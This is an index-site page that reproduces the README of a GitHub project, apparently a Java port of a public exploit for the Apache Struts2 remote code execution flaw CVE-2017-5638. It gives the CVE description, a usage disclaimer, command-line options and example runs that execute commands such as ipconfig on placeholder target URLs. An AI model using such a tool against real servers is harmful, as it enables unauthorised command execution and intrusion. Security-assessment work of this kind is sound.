Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/m3ssap0/struts2_cve-2017-5638

This is a sort of Java porting of the Python exploit at: https://www.exploit-db.com/exploits/41570/.
https://github.com/m3ssap0/struts2_cve-2017-5638

cve-2017-5638 exploit security security-tools struts2 vulnerability vulnerability-scanners

Last synced: 23 days ago
JSON representation

This is a sort of Java porting of the Python exploit at: https://www.exploit-db.com/exploits/41570/.

Host: GitHub
URL: https://github.com/m3ssap0/struts2_cve-2017-5638
Owner: m3ssap0
License: mit
Created: 2018-02-28T22:11:50.000Z (almost 7 years ago)
Default Branch: master
Last Pushed: 2018-03-10T11:56:50.000Z (almost 7 years ago)
Last Synced: 2024-11-13T07:36:28.343Z (3 months ago)
Topics: cve-2017-5638, exploit, security, security-tools, struts2, vulnerability, vulnerability-scanners
Language: Java
Homepage:
Size: 8.79 KB
Stars: 1
Watchers: 2
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE.txt

Awesome Lists containing this project

README

# struts2_cve-2017-5638

This is a sort of Java porting of the Python exploit at: [https://www.exploit-db.com/exploits/41570/](https://www.exploit-db.com/exploits/41570/).

This software is written to have no external dependencies.

## DISCLAIMER

**This tool is intended for security engineers and appsec guys for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which any one uses this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.**

## Vulnerability info

* **CVE-ID**: CVE-2017-5638
* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638)
* **Description**: The Jakarta Multipart parser in **Apache Struts 2** 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted *Content-Type*, *Content-Disposition*, or *Content-Length* HTTP header, as exploited in the wild in March 2017 with a *Content-Type* header containing a *#cmd=* string.

## Help

```
Usage:
java -jar struts2_cve-2017-5638.jar [options]
Description:
Exploiting Apache Struts2 Remote Code Execution (CVE-2017-5638).
Options:
-h, --help
Prints this help and exits.
-u, --url [target_URL]
The target URL where the exploit will be performed.
-cmd, --command [command_to_execute]
The command that will be executed on the remote machine.
--cookies [cookies]
Optional. Cookies passed into the request, i.e. authentication cookies.
-v, --verbose
Optional. Increase verbosity.
```

## Examples

```
java -jar struts2_cve-2017-5638.jar --url "https://vuln1.foo.com/asd" --command ipconfig
```

```
java -jar struts2_cve-2017-5638.jar --url "https://vuln2.foo.com/asd" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
```

```
java -jar struts2_cve-2017-5638.jar --url "https://vuln3.foo.com/asd" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
```

## Authors

* **Antonio Francesco Sardella** - *Java porting* - [m3ssap0](https://github.com/m3ssap0)

## License

This project is licensed under the MIT License - see the **LICENSE.txt** file for details.

## Acknowledgments

* [Vex Woo](https://www.exploit-db.com/author/?a=8906) for the original Python exploit.